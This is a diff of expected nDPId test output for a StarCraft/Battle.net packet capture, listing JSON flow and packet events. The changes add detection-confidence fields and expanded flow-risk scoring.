 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1437389964552,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1437389964552,"pkt":"hCYVPnXEIImEa8W6CABFAAAobDJAAIAGrO7AqAFkrcJx4A2yAFD3XxLYPAYOT1AQAQBqlgAA"}
-00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389964518,"flow_last_seen":1437389964552,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":350,"flow_tot_l4_payload_len":350,"flow_avg_l4_payload_len":87,"midstream":0,"ts_msec":1437389964552,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"173.194.113.224","src_port":3506,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Google","breed":"Acceptable","category":"Advertisement"},"http": {"hostname":"www.google-analytics.com","url":"www.google-analytics.com\/collect","code":0,"content_type":"","user_agent":"Battle.net\/1.3.0.5952"}}
+00812{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389964518,"flow_last_seen":1437389964552,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":350,"flow_tot_l4_payload_len":350,"flow_avg_l4_payload_len":87,"midstream":0,"ts_msec":1437389964552,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"173.194.113.224","src_port":3506,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Advertisement"},"http": {"hostname":"www.google-analytics.com","url":"www.google-analytics.com\/collect","code":0,"content_type":"","user_agent":"Battle.net\/1.3.0.5952"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389964752,"flow_last_seen":1437389964752,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1437389964752,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":60026,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1437389964752,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"ts_msec":1437389964752,"pkt":"hCYVPnXEIImEa8W6CABFAAA\/X2UAAIARVpbAqAFkwKgB\/up6ADUAK3heAXYBAAABAAAAAAAABGxsbncIYmxpenphcmQDY29tAAABAAE="}
-00747{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389964752,"flow_last_seen":1437389964752,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1437389964752,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":60026,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"llnw.blizzard.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389964752,"flow_last_seen":1437389964752,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1437389964752,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":60026,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"llnw.blizzard.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1437389964783,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"ts_msec":1437389964783,"pkt":"hCYVPnXEIImEa8W6CABFAAA\/X2YAAIARVpXAqAFkwKgB\/up6ADUAK3heAXYBAAABAAAAAAAABGxsbncIYmxpenphcmQDY29tAAABAAE="}
 00574{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1437389964788,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":144,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":144,"pkt_l4_len":110,"ts_msec":1437389964788,"pkt":"IImEa8W6hCYVPnXECABFAACCAABAAEARtbjAqAH+wKgBZAA16noAbnPyAXaBgAABAAMAAAAABGxsbncIYmxpenphcmQDY29tAAABAAHADAAFAAEAAFQfABcIYmxpenphcmQCdm8FbGxud2QDbmV0AMAvAAEAAQAAATwABFf43f7ALwABAAEAAAE8AARX+N39"}
-00764{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":55,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389964752,"flow_last_seen":1437389964788,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":57,"midstream":0,"ts_msec":1437389964788,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":60026,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"llnw.blizzard.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"87.248.221.254"}}
+00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":55,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389964752,"flow_last_seen":1437389964788,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":57,"midstream":0,"ts_msec":1437389964788,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":60026,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"llnw.blizzard.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"87.248.221.254"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389964790,"flow_last_seen":1437389964790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1437389964790,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"87.248.221.254","src_port":3508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1437389964790,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1437389964790,"pkt":"hCYVPnXEIImEa8W6CABFAAA0FwlAAIAG67fAqAFkV\/jd\/g20AFApaAewAAAAAIAC\/\/838QAAAgQFtAEDAwgBAQQC"}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1437389964848,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1437389964848,"pkt":"IImEa8W6hCYVPnXECABFAAA0tGpAAPUG2VVX+N3+wKgBZABQDbTA0NjuKWgHsYAS\/\/+fJQAAAgQFtAEDAwQEAgAA"}
 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1437389964848,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1437389964848,"pkt":"hCYVPnXEIImEa8W6CABFAAAoFwpAAIAG68LAqAFkV\/jd\/g20AFApaAexwNDY71AQBADa8wAA"}
-00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389964790,"flow_last_seen":1437389964848,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1437389964848,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"87.248.221.254","src_port":3508,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"llnw.blizzard.com","url":"llnw.blizzard.com\/sc2-pod-retail\/AF11CD00\/EU\/24621.direct\/s2-36281-BA356DD57557728843CAF63A12C79AA3.mfil","code":0,"content_type":"","user_agent":"Blizzard Web Client"}}
-00926{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":62,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437389964790,"flow_last_seen":1437389964921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1647,"flow_avg_l4_payload_len":274,"midstream":0,"ts_msec":1437389964921,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"87.248.221.254","src_port":3508,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4":"Binary application transfer"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"llnw.blizzard.com","url":"llnw.blizzard.com\/sc2-pod-retail\/AF11CD00\/EU\/24621.direct\/s2-36281-BA356DD57557728843CAF63A12C79AA3.mfil","code":200,"content_type":"application\/octet-stream","user_agent":"Blizzard Web Client"}}
+00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389964790,"flow_last_seen":1437389964848,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1437389964848,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"87.248.221.254","src_port":3508,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"llnw.blizzard.com","url":"llnw.blizzard.com\/sc2-pod-retail\/AF11CD00\/EU\/24621.direct\/s2-36281-BA356DD57557728843CAF63A12C79AA3.mfil","code":0,"content_type":"","user_agent":"Blizzard Web Client"}}
+01035{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":62,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437389964790,"flow_last_seen":1437389964921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1647,"flow_avg_l4_payload_len":274,"midstream":0,"ts_msec":1437389964921,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"87.248.221.254","src_port":3508,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"llnw.blizzard.com","url":"llnw.blizzard.com\/sc2-pod-retail\/AF11CD00\/EU\/24621.direct\/s2-36281-BA356DD57557728843CAF63A12C79AA3.mfil","code":200,"content_type":"application\/octet-stream","user_agent":"Blizzard Web Client"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":234,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389967432,"flow_last_seen":1437389967432,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1437389967432,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"12.129.222.54","src_port":3512,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1437389967432,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1437389967432,"pkt":"hCYVPnXEIImEa8W6CABFAAA0U2dAAIAG+pjAqAFkDIHeNg24AFDXJA2NAAAAAIACIACvkgAAAgQFtAEDAwgBAQQC"}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1437389967630,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1437389967630,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAAC0GoQAMgd42wKgBZABQDbj6JMXG1yQNjoASFtD4xgAAAgQFtAEBBAIBAwMH"}
 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1437389967630,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1437389967630,"pkt":"hCYVPnXEIImEa8W6CABFAAAoU2hAAIAG+qPAqAFkDIHeNg24AFDXJA2O+iTFx1AQAQBPaQAA"}
-00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":237,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389967432,"flow_last_seen":1437389967639,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":21,"midstream":0,"ts_msec":1437389967639,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"12.129.222.54","src_port":3512,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"},"http": {"hostname":"us.scan.worldofwarcraft.com","url":"us.scan.worldofwarcraft.com\/update\/Launcher.txt","code":0,"content_type":"","user_agent":""}}
+00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":237,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389967432,"flow_last_seen":1437389967639,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":21,"midstream":0,"ts_msec":1437389967639,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"12.129.222.54","src_port":3512,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"},"http": {"hostname":"us.scan.worldofwarcraft.com","url":"us.scan.worldofwarcraft.com\/update\/Launcher.txt","code":0,"content_type":"","user_agent":""}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":245,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968486,"flow_last_seen":1437389968486,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1437389968486,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":245,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1437389968486,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1437389968486,"pkt":"hCYVPnXEIImEa8W6CABFAAAoaD9AAIAGnzjAqAFkAuQuaA2kAbvjTIWjXKb5cVARAQDtEwAA"}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":246,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968487,"flow_last_seen":1437389968487,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1437389968487,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3489,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -119,24 +119,24 @@
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1437389970671,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1437389970671,"pkt":"hCYVPnXEIImEa8W6CABFAAA0DEUAAIARlo\/AqAFkrcIoFtFAAbsAIKDYDBnPzxTN69maK3zVmJ1A8q4\/WcfKtlQW"}
 00545{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":295,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389976946,"flow_last_seen":1437389976946,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1437389976946,"l3_proto":"ip4","src_ip":"192.168.1.107","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1437389976946,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":60,"pkt_l4_len":16,"ts_msec":1437389976946,"pkt":"AQBeAAAWtFJ+6zOBCABGAAAoAABAAAECQqbAqAFr4AAAFpQEAAAiAPkCAAAAAQQAAADgAAD7AQEICgBN"}
-00578{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389976946,"flow_last_seen":1437389976946,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1437389976946,"l3_proto":"ip4","src_ip":"192.168.1.107","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00604{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389976946,"flow_last_seen":1437389976946,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1437389976946,"l3_proto":"ip4","src_ip":"192.168.1.107","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":296,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1437389980126,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":60,"pkt_l4_len":16,"ts_msec":1437389980126,"pkt":"AQBeAAAWtFJ+6zOBCABGAAAoAABAAAECQqbAqAFr4AAAFpQEAAAiAPkCAAAAAQQAAADgAAD7DndzYmFj"}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":297,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389981134,"flow_last_seen":1437389981134,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1437389981134,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":53145,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1437389981134,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1437389981134,"pkt":"hCYVPnXEIImEa8W6CABFAAA+X2cAAIARVpXAqAFkwKgB\/s+ZADUAKjZ5W6oBAAABAAAAAAAABW55ZHVzBmJhdHRsZQNuZXQAAAEAAQ=="}
-00747{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":297,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389981134,"flow_last_seen":1437389981134,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1437389981134,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":53145,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"nydus.battle.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":297,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389981134,"flow_last_seen":1437389981134,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1437389981134,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":53145,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"nydus.battle.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1437389981164,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1437389981164,"pkt":"hCYVPnXEIImEa8W6CABFAAA+X2gAAIARVpTAqAFkwKgB\/s+ZADUAKjZ5W6oBAAABAAAAAAAABW55ZHVzBmJhdHRsZQNuZXQAAAEAAQ=="}
 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1437389981169,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1437389981169,"pkt":"IImEa8W6hCYVPnXECABFAABOAABAAEARtezAqAH+wKgBZAA1z5kAOuq0W6qBgAABAAEAAAAABW55ZHVzBmJhdHRsZQNuZXQAAAEAAcAMAAEAAQAAAAYABFDvuho="}
-00762{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":299,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389981134,"flow_last_seen":1437389981169,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":118,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1437389981169,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":53145,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"nydus.battle.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"80.239.186.26"}}
+00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":299,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389981134,"flow_last_seen":1437389981169,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":118,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1437389981169,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":53145,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"nydus.battle.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"80.239.186.26"}}
